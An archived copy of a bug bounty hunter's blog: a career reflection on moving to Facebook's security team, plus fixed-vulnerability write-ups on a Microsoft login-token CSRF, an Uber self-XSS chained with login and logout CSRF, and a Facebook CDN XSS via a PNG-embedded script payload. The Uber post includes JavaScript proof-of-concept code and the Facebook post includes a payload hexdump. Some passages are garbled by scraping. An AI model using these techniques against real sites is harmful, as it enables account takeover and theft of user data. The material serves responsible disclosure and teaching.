Are you over 18 and want to see adult content?
More Annotations
A complete backup of ralphlaurenskjorte.dk
Are you over 18 and want to see adult content?
A complete backup of schuttsports.com
Are you over 18 and want to see adult content?
A complete backup of loan-republic.com
Are you over 18 and want to see adult content?
A complete backup of sailingscuttlebutt.com
Are you over 18 and want to see adult content?
A complete backup of cactusleague.com
Are you over 18 and want to see adult content?
A complete backup of mtindicators.com
Are you over 18 and want to see adult content?
Favourite Annotations
A complete backup of www.www.vintagemags.org
Are you over 18 and want to see adult content?
A complete backup of www.muscletease.com
Are you over 18 and want to see adult content?
A complete backup of www.www.partyflock.nl
Are you over 18 and want to see adult content?
A complete backup of www.www.onlytorrents.com
Are you over 18 and want to see adult content?
A complete backup of www.www.smart-pays.com
Are you over 18 and want to see adult content?
A complete backup of www.www.freudenhaus.de
Are you over 18 and want to see adult content?
A complete backup of amandadouglasforcongress.com
Are you over 18 and want to see adult content?
Text
Open Menu
* Home
* About
* back
*
JACK
I participate in bug bounty programmes* Learn More
* __ Email
* __ Twitter
* __ GitHub
* Posts
* back
* All Posts
* All Tags
Image source: _robson_JACK
LATEST POSTS
April 19, 2020
Jack
__ Reading time ~13 minutes FROM BUG BOUNTY HUNTER, TO ENGINEER, AND BEYOND A couple weeks ago I had my last day on Facebook’s Product Security team. A bittersweet moment, but one which marks a “new chapter” inmy life…
I’ve spent just over 4 years working on “the other side” of bug bounties, but it’s also been 4 years since I last blogged, so I wanted to share some of my learnings as to how it was going from hacking on programs to being asecurity engineer.
I also wanted to share a bit about the journey I took. This is one of the first times I’ve been able to fully reflect (in a kinda long, rambly way), so writing this down was always going to be fun. ------------------------- “OLD-SCHOOL” BUG BOUNTY Without sounding like an old-school, grey-beard hacker (I’m not _that_ old), the landscape _really_ has changed over the ~8 years I’ve been following, and been a part of, the bug bounty community. “Back in the day” you mainly had a choice of Google, Mozilla, Facebook and PayPal to hack on. I have fond memories of having a Google alert setup for the words “bug bounty” and “vulnerability disclosure program”, just so that I could find any new program to hack on. There was also Bugcrowd’s infamous “The List” , which I’d consult. Aside from the limited amount of programs, the tools and techniques used to find bugs on these various sites was wildly different than itis now.
Believe it or not, even the generic, “Paste an XSS payload into a search box”, bug taught in various old tutorials was a valid findingon large programs
.
Now, it seems like a lot of the effort put in to finding bugs is in the context of recon - finding assets and end-points which could be pretty green and untouched, increasing the likelihood of finding a high paying bug. This is not necessarily a bad thing, it just means that it’s more important than ever for new-comers to understand WebAppSec techniques _and_ the various recon tooling. (As a side note, the one program I know of which _doesn’t_ require heavy recon is Facebook, given that it’s a single, huge domain, but I may be bias promoting that particular program…)FIRST REWARD
Anyway, digging through my bug bounty folder, I managed to find the first valid bug I found, which was a CSRF issue within PayPal. This was nearly 8 years ago, but it’s what got me hooked on something (relatively) new at the time - getting paid to find bugs. I’d sent in a few bugs prior to this, both to PayPal and Facebook, but receiving a “you’ve found an eligible issue” email felt great, despite the finding being pretty low-risk.RAMPING UP
From this point, I knew I needed to do two things: * Learn as much as I could from other, more established researchers to understand their techniques for finding bugs (and the common patterns seen across a program) * Find as many bugs as possible - in hindsight, this is not the best idea (as most programs value quality over quantity), but while I was starting out, it helped me get an idea of validity, and the non-technical aspects of writing reports etc I also started blogging about my findings. The reason behind this was that I wanted to share some info back to the community that I’d learnt so much from. The other reason (which, IMO, is also a common reason) was that I could leverage these public blog posts into a job offer within the security industry. My background at the time was as a web developer, with no university degree or qualifications. So from here, I hunted and hunted and hunted. The Yahoo program launched at some point in 2013 and it was _so_ fun. Got some great findings and responses, including the following email I recently found buried in a screenshot folder somewhere. Once they started paying their findings out via HackerOne, I had the (brief) enjoyment of being “The Top Hacker™”. That too was buried in a screenshot folder. Around the same time, I started spending more and more time exclusively on the Facebook program. This is a trend I still see today - as you hack more and more on the same program, you start to get a sense for how the code is written (despite black-boxing it), for when new code is deployed (despite not having access to the CI infra), and for when a mistake may have been made (which is when you turn that “spidey sense” into a validsubmission).
FACEBOOK BUG BOUNTY
The Facebook Bug Bounty program is where I spent the majority of my free time. I never made #1 on their leaderboard (always #2…), but I found some fun bugs and wrote up some interesting posts . Over time I got to _really_ understand the code behind www, despite never having seen it. The majority of findings are what would becalled IDORs
, although
“bypassing read/write privacy” is a nicer term IMO.One of
many fun screenshots from the Whitehat program My biggest finding came when I found a way of accessing anyone’s account. This bug was one of the most simple, generic IDORs you could think of (change “profile_id” to someone else’s user ID…), but as with most programs, Facebook pays based on impact not oncomplexity.
For this bug, and others, they issued me one of the coveted Whitehat Debit Cards. It was fun (read: _slightly_ annoying) having credit card receipts issued to Mr. Bounty. Understandably, these aren’t used anymore as loading up and sending out thousands of cards per year would be too much, but back then the card itself was worth (to me, in terms of sentimental value) almost as much as the dollar reward. After a few years of hacking Facebook spun up a ProdSec team in London, which was perfect as I’m based in the UK and didn’t want to leave to go to America. I got the opportunity to interview for the role of Product Security Engineer, went to the office, did the interview… -------------------------JOINING FACEBOOK
…and failed. It sucked - joining Facebook was one of the end-goals of me spending so much time hacking on their program. But the reason I’m mentioning this (likely for the first time) is that in terms of a career, going back and having to re-learn some areas that you’re not 100% at isn’t a huge deal. I re-interviewed a while later and then joined in April 2016. My first day was such a surreal experience. For years I knew the website inside and out, but finally I got a laptop with a check-out ofthe codebase.
_Spoiler: this post doesn’t contain any NDA-breaching info that will help you find bugs in Facebook. If you really want access to the secret codebase, CLICK HERE _ I went through the usual bootcamp process that Facebook has, and finally joined the team to start looking for bugs and suggesting improvements to various product teams. This was when I made the (virtual) switch from being a “hunter” to an “engineer”. “EVERYTHING IS A P0” A mindset that I _needed_ to shift out of when joining Facebook was a common one that a lot of researchers have, and that’s that “every finding is a P0, you MUST fix this now, if you don’t the world will end and society will collapse”. Now, there _could_ be the odd bug where this is the case, but most of the time when working with a product team you need to understand trade-offs, and come up with solutions that are fair to other areas other than security. You could be the most l33t researcher, dropping 0-days and absolutely crushing it, but if you can’t articulate risk to a _non_ security engineer, then it’s not going to work out.RUNNING A PROGRAM
Given that my background is in bug bounties, it made sense for me to start working on Facebook’s own program. This too needed a bit of a mindset switch - I’d never triaged a report before, never looked for a root cause (other than in client-side JS), nor sat in on a payout meeting to discuss reward amounts. But one thing that I could bring to the program was the empathy aspect, given that I’d been on the _receiving_ end of messages and updates from a bug bounty program many times (one thing to note here is that this wasn’t a unique skill - at the time, and even more so now, some of the engineers working on Whitehat had bug bountyexperience).
RESEARCHER ENGAGEMENT One part of my role at Facebook that I kinda “accidentally” fell in to was giving presentations to researchers about our team, and the Whitehat program. It started off as something that I wasn’t sure I wanted to do - public speaking was a pretty big fear of mine, but I had an awesome manager who helped me overcome this fear. But, after giving my first external presentation at Nullcon in 2017, I realised this was something I actually _really_ enjoyed. Being able to share some “inside tips” on how people could succeed in the world of bug bounties was rewarding. These presentations, and focus groups run with researchers, allowed me to understand the pain points and help ensure that researchers were enjoying their experience with the program. In fact, this will be probably the biggest thing I’ll miss fromWhitehat.
------------------------- FINDING BUGS AS AN ENGINEER Whilst I was at Facebook, I did have the chance to find bugs in other programs, but my throughput went down massively. Prior to my start date, I was hunting most days and finding valid bugs in most of those sessions. However, after joining, these were the only months I hacked during (and some of these only ended up with one or two valids): Given that my day was full up with engineering work, investigating security bugs, etc, I took the decision to ensure that my _free time_ was full of non-work related things (for more info, you should really read NathOnSecurity’s post regarding Bug Bounties and Mental Health).
But for the few times I was hunting, the technical and non-technical skills I was learning and using from helping run the Whitehat program, and from security reviews for teams, helped greatly:VISUALING CODE
After reviewing enough code (which believe me, I did…), you start to be able to visualise how a request is being handled. This is usually regardless of the application, or language it’s written in, given that in most cases it’ll be roughly similar. In terms of bug bounty, this helped a lot. I could look at an end-point, guesstimate what could be happening to the parameters I’d passed in before the HTTP response is sent. Now, given that I’d seen some of the common mistakes Software Engineers had made over the years with handling user-provided data, you can then assume that other engineering teams at other companies could be making similar mistakes, and therefore find bugs that way. The great thing about this is that you _don’t_ need to join a tech company to learn this skill. Chose a random web app open source project on GitHub and take a look through some of the previous security issues they’ve had. You’ll see real world mistakes, from real world engineers, and can then start to visualise these mistakes when black-box testing a bug bounty property.EMPATHY
As I mentioned above, empathy was a key aspect to the 4 years at Facebook, both inside and outside of work. As a researcher, sending in a submission, you want to have a reply within minutes, a fix within hours, and a $$$$ payout within a day. In an ideal world, that’d be the case, but it doesn’t work like that. When sending in bugs, you have to understand the _huge_ amount of work that could be going on behind the scenes. For example, a bug may look like a simple reflected XSS which just needs a variable wrapped in htmlspecialchars for the submission to be resolved (pro-tip: please don’t _actually_ fix XSS this way…), but in-fact it’s a systemic issue in a core library used by a ton ofrandom properties.
In addition, consider the fact that it may have been exploited, so now various other teams have to do IR, or legal teams need to be involved before any replies can be sent to a researcher. Now, that’s _not_ to excuse the cases where a submission gets lost in the ether, or where the program simply doesn’t care about security issues (I’m purposely leaving out 30/90/120 day disclosure deadlines etc out of this post so that I don’t start a Twitter storm…), but more often than not, for a reputable program, bugs _are_ being fixed but can take a lot longer than it seems.REWARD AMOUNTS
Similar to the empathy aspect of the (potential) long waits for bugs to be fixed, one other area that I got to learn a lot about was reward amounts. The main thing to mention here (and of course there are caveats, but this should be the same for any reputable program) is that programs aren’t trying to cheat you out of a reward. No (again, reputable) program is trying to shave off $500 off of your reward just to “save money”. One of the ways that can help alleviate these concerns is by publishing reward amounts of various bug types (or even examples of amounts for previous specific findings), but even this can cause drama - if the bounty table says “SSRF - $10,000”, but you only get paid $5,000, then you’ve been cheated, right? Well, not exactly, since more often than not you need to consider thefollowing:
* Do you need to be authenticated to perform the SSRF, and if so, what type of account do you need (one requiring high-privs is going to be harder to exploit)? * Is the host which is vulnerable to SSRF firewalled/in a DMZ? * Can you extract data or only blindly hit end-points with a GET?And so on….
Programs can help you in these cases where you feel there is a discrepancy by explaining the mitigating factors (or in the case you got _more_ than $10,000, by explaining the compounding factors), but again, (most) programs aren’t lowering the amounts just to “savemoney”.
-------------------------THE FUTURE
Soon I’ll be starting a new role, one which will likely see me slightly more removed from the bug bounty world, but I’ll keeping a close on eye on the ever changing techniques and novel findings 👀. In terms of the future of bug bounties, who knows what will be the new norm over the next 4 years, but regardless I’m sure it will benefit both sides of the community. I may also dump a few of my older findings from over the past few years on this blog…THANK YOU
Finally, one thing I neglected over the years was to give specific “thank-you” to all of the various researchers who helped me be who I am today, either directly or indirectly. The OG 2012/2013 Facebook Hunters (Egor, Nir, Neal, Charlie B) who blogged are a main reason I am where I am today. Then the researchers who were hacking (and still are) at the same time as me, Josip & phwd (too many fun times at DEFCON together…), Anand, Pranav, Dmitry, Youssef, and many others. Theres also the hunters who made me feel welcome at my first, and all the future DEFCONs - Bitquark, Jhaddix, Nahamsec, and plenty more. And then finally, the people who still blow my mind when I read their posts - Ngalog for taking over the #1 spot on Uber from me, Shubs for his crazy recon skills, Frans for the sick presentations I’ve seen at our events, and so on…April 03, 2016
Jack
__ Reading time ~3 minutes OBTAINING LOGIN TOKENS FOR AN OUTLOOK, OFFICE OR AZURE ACCOUNT _This is pretty similar to Wes’s awesome OAuth CSRF in Live, except
it’s in the main Microsoft authentication system rather than the OAuth approval prompt._ Microsoft, being a huge company, have various services spread across multiple domains (*.outlook.com, *.live.com, and so on). To handle authentication across these services, requests are made to login.live.com , login.microsoftonline.com , and login.windows.net to get a session for the user. The flow for outlook.office.com is asfollows:
* User browses to https://outlook.office.com * User is redirected to https://login.microsoftonline.com/login.srf?wa=wsignin1.0&rpsnv=4&wreply=https%3a%2f%2foutlook.office.com%2fowa%2f&id=260563 * Provided that the user is logged in, a POST request is made back to the value of wreply, with the form field t containing a login tokenfor the user:
parameters multiple
times. Occasionally this can be used to bypass different filters, which is the root cause of the bug. In this case, wreply is URL-decoded before the domain is checked. Therefore https%3a%2f%2foutlook.office.com%2f becomes https://outlook.office.com/, which is valid, and the request goesthrough.
Which then gives us complete access to the user’s account: Note: The token is only valid for the service which issued it - an Outlook token can’t be used for Azure, for example. But it’d be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way. This was quite a fun CSRF to find and exploit. Despite CSRF bugs not having the same credibility as other bugs, when discovered in authentication systems their impact can be pretty large.FIX
The hostname in wreply now must end in %2f, which gets URL-decoded to/.
This ensures that the browser only sends the request to the intendedhost.
TIMELINE
* Sunday, 24th January 2016 - Issue Reported * Sunday, 24th January 2016 - Issue Confirmed & Triaged * Tuesday, 26th January 2016 - Issue PatchedMarch 22, 2016
Jack
__ Reading time ~6 minutes UBER BUG BOUNTY: TURNING SELF-XSS INTO GOOD-XSS _Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts._ On Uber’s Partners portal , where Drivers can login and update their details, I found a very simple, classic XSS: changing the value of one of the profile fields to causes the code to be executed, and an alert box popped. This took all of two minutes to find after signing up, but now comesthe fun bit.
SELF-XSS
Being able to execute additional, arbitrary JavaScript under the context of another site is called Cross-Site Scripting(which I’m
assuming 99% of my readers know). Normally you would want to do this against other users in order to yank session cookies, submit XHR requests, and so on. If you _can’t_ do this against another user - for example, the code only executes against your account, then this is known as a self-XSS. In this case, it would seem that’s what we’ve found. The address section of your profile is only shown to you (the exception may be if an internal Uber tool also displays the address, but that’s another matter), and we can’t update another user’s address to force it to be executed against them. I’m always hesitant to send in bugs which have potential (an XSS in this site would be cool), so let’s try and find a way of removing the “self” part from the bug. UBER OAUTH LOGIN FLOW The OAuth that flow Uber uses ispretty typical:
* User visits an Uber site which requires login, e.g.partners.uber.com
* User is redirected to the authorisation server, login.uber.com * User enters their credentials * User is redirected back to partners.uber.com with a code, which can then be exchanged for an access token In case you haven’t spotted from the above screenshot, the OAuth callback, /oauth/callback?code=..., doesn’t use the recommendedstate
parameter. This introduces a CSRF vulnerability in the login function, which may or may-not be considered an important issue. In addition, there is a CSRF vulnerability in the logout function, which _really_ isn’t considered an issue. Browsing to /logout destroys the user’s partner.uber.com session, and performs a redirect to the same logout function on login.uber.com. Since our payload is only available inside our account, we want to log the user into our account, which in turn will execute the payload. However, logging them into our account destroys their session, which destroys a lot of the value of the bug (it’s no longer possible to perform actions on their account). So let’s chain these three minor issues (self-XSS and two CSRF’s) together. _For more info on OAuth security, check out @homakov’s awesome guide._
CHAINING MINOR BUGS
Our plan has three parts to it: * First, log the user out of their partner.uber.com session, but _not_ their login.uber.com session. This ensures that we can log them back into their account * Second, log the user into _our_ account, so that our payload willbe executed
* Finally, log them back into _their_ account, whilst our code is still running, so that we can access their details STEP 1. LOGGING OUT OF ONLY ONE DOMAIN We first want to issue a request to https://partners.uber.com/logout/, so that we can then log them into our account. The problem is that issuing a requets to this end-point results in a 302 redirect to https://login.uber.com/logout/, which destroys the session. We can’t intercept each redirect and drop the request, since the browser follows these implicitly. However, one trick we can do is to use Content Security Policyto define
which sources are allowed to be loaded (I hope you can see the irony in using a feature designed to help mitigate XSS in this context). We’ll set our policy to only allow requests to partners.uber.com, which will block https://login.uber.com/logout/. This works, as indicated by the CSP violation error message: STEP 2. LOGGING INTO OUR ACCOUNT This one is relatively simple. We issue a request to https://partners.uber.com/login/ to initiate a login (this is needed else the application won’t accept the callback). Using the CSP trick we prevent the flow being completed, then we feed in our own code (which can be obtained by logging into our own account), which logs them in to our account. Since a CSP violation triggers the onerror event handler, this will be used to jump to the next step. //Initiate login so that we can redirect them var login = function() { var loginImg = document.createElement('img'); loginImg.src = 'https://partners.uber.com/login/'; loginImg.onerror = redir;}
//Redirect them to login with our code var redir = function() { //Get the code from the URL to make it easy for testing var code = window.location.hash.slice(1); var loginImg2 = document.createElement('img'); loginImg2.src = 'https://partners.uber.com/oauth/callback?code=' + code; loginImg2.onerror = function() { //Redirect to the profile page with the payload window.location = 'https://partners.uber.com/profile/';}
}
STEP 3. SWITCHING BACK TO THEIR ACCOUNT This part is the code that will be contained as the XSS payload, stored in our account. As soon as this payload is executed, we can switch back to their account. This MUST be in an iframe - we need to be able to continuerunning our code.
//Create the iframe to log the user out of our account and back into theirs var loginIframe = document.createElement('iframe'); loginIframe.setAttribute('src', 'https://fin1te.net/poc/uber/login-target.html'); document.body.appendChild(loginIframe); The contents of the iframe uses the CSP trick again: //Log them into partners via their session on login.uber.com var redir = function() { window.location = 'https://partners.uber.com/login/';};
The final piece is to create _another_ iframe, so we can grab some oftheir data.
//Wait a few seconds, then load the profile page, which is now *their* profile setTimeout(function() { var profileIframe = document.createElement('iframe'); profileIframe.setAttribute('src', 'https://partners.uber.com/profile/'); profileIframe.setAttribute('id', 'pi'); document.body.appendChild(profileIframe); //Extract their email as PoC profileIframe.onload = function() { var d = document.getElementById('pi').contentWindow.document.body.innerHTML; var matches = /value="(+)" name="email"/.exec(d);alert(matches);
}
}, 9000);
Since our final iframe is loaded from the same origin as the Profile page containing our JS, and X-Frame-Options is set to sameorigin NOT deny, we can access the content inside of it (using contentWindow)
PUTTING IT ALL TOGETHER After combining all the steps, we have the following attack flow: * Add the payload from step 3 to our profile * Login to our account, but cancel the callback and make note of the unused code parameter * Get the user to visit the file we created from step 2 - this is similar to how you would execute a reflected-XSS against someone * The user will then be logged out, and logged into our account * The payload from step 3 will be executed * In a hidden iframe, they’ll be logged out of _our_ account * In another hidden iframe, they’ll be logged into _their_ account * We now have an iframe, in the same origin containing the user’ssession
This was a fun bug, and proves that it’s worth persevering to show a bug can have a higher impact than originally thought.January 27, 2016
Jack
__ Reading time ~6 minutes AN XSS ON FACEBOOK VIA PNGS & WONKY CONTENT TYPES Content uploaded to Facebook is stored on their CDN, which is
served via various domains (most of which are sub-domains of either akamaihd.net or fbcdn.net). The captioning feature of Videos also stores the .srt files on the CDN, and I noticed that right-angle brackets wereun-encoded.
https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xaf1/….srt I was trying to think of ways to get the file interpreted as HTML. Maybe MIME sniffing (since there’s no X-Content-Type-Optionheader)?
It’s actually a bit easier than that. We can just change the extension to .html (which probably shouldn’t be possible…). https://fbcdn-dragon-a.akamaihd.net/hphotos-ak-xaf1/t39.2093-6/….html Unfortunately left angles are stripped out (which I later found out was due to @phwd ’s very much relatedfinding
),
so there’s not much we can do here. Instead, I looked for other files which could also be loaded as text/html. A lot of the photos/videos on Facebook now seem to contain a hash in the URL (parameters oh and __gda__), which causes an error to be thrown if we modify the file extension. Luckily, advert images don’t contain these parameters. All that we have to do now is find a way to embed some HTML into an image. The trouble is that Exifdata is
stripped out of JPEGs, and iTXt chunks are stripped out of PNGs. If we try to blindly insert a string into an image and upload it wereceive an error.
PNG IDAT CHUNKS
I started searching for ideas and came across this great blog post: “Encoding Web Shells in PNG IDAT chunks”.
This section of this bug is made possible due that post, so props tothe author.
The post describes encoding data into the IDAT chunk, which ensures it’ll stay there even after the modifications Facebook’s image uploader makes. The author kindly provides a proof-of-concept image, which worked
perfectly (the PHP shell obviously won’t execute, but it demonstrates that the data survived uploading). Now, I could have submitted the bug there and then - we’ve got proof that images can be served with a content type of text/html, and angle brackets aren’t encoded (which means we can certainly inject HTML). But that’s boring, and everyone knows an XSS isn’t an XSS withoutan alert box.
The author also provides an XSS ready PNG , which I could just upload and be done. But since it references a remote JS file, I wasn’t too keen on the bug showing up in a referer log. Plus I wanted to try myself to create one of these images. As mentioned in post, the first step is to craft a string, that when compressed using DEFLATE , produces the desired output. Which in this case is: Combining the result, with the PHP code for reversing PNG filters and generating the image, gives us the following: Which, when dumped, shows our payload: fin1te@mbp /tmp » hexdump -C xss-fnt-pe-png.png 00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR| 00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed |... ... ........| 00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e |.....pHYs.......| 00000030 c4 01 95 2b 0e 1b 00 00 00 65 49 44 41 54 48 89 |...+.....eIDATH.| 00000040 63 ac ff 3C 53 43 52 49 50 54 20 53 52 43 3D 2F |c.....F.....=s....| 00000070 43 2f 0f b5 ab a7 af ca 7e 7d 2d ea e2 90 22 ae |C/......~}-...".| 00000080 73 85 45 60 7a 90 d1 8c 3f 0c a3 60 14 8c 82 51 |s.E`z...?..`...Q| 00000090 30 0a 46 c1 28 18 05 a3 60 14 8c 82 61 00 00 78 |0.F.(...`...a..x| 000000a0 32 1c 02 78 65 1f 48 00 00 00 00 49 45 4e 44 ae |2..xe.H....IEND.| 000000b0 42 60 82 |B`.| We can then upload it to our advertiser library, and browse to it (with an extension of .html).BYPASSING LINK SHIM
What can you do with an XSS on a CDN domain? Not a lot. All I could come up with is a LinkShim bypass. LinkShim is script/tool which all external links on Facebook are forced through. This then checks for malicious content. CDN URL’s however _aren’t_ Link Shim’d, so we can use this as abypass.
MOVING FROM THE AKAMAI CDN HOSTNAME TO *.FACEBOOK.COM Redirects are pretty boring. So I thought I’d check to see if any *.facebook.com DNS entries were pointing to the CDN. I found photo.facebook.com (I forgot to screenshot the output of dig before the patch, so here’s an entry from Google’s cache): Browsing to this host with our image as the path loads a JavaScript file from fnt.pe , which then displays an alert boxwith the hostname.
Any session cookies are marked as HTTPOnly, and we
can’t make requests to www.facebook.com. What do we do other than popping an alert box? ENTER DOCUMENT.DOMAIN It’s possible for two pages from a different origin, but sharing the same parent domain, to interact with each other, providing they both set the document.domain property to the parent domain. We can easily do this for our page, since we can run arbitrary JavaScript. But we also need to find a page on www.facebook.com which does the same, and doesn’t have an X-Frame-Options header set to DENY or SAMEORIGIN (we’re still cross-origin at thispoint).
This wasn’t too difficult to find - Facebook has various plugins which are meant to be placed inside anDetails
Copyright © 2024 ArchiveBay.com. All rights reserved. Terms of Use | Privacy Policy | DMCA | 2021 | Feedback | Advertising | RSS 2.0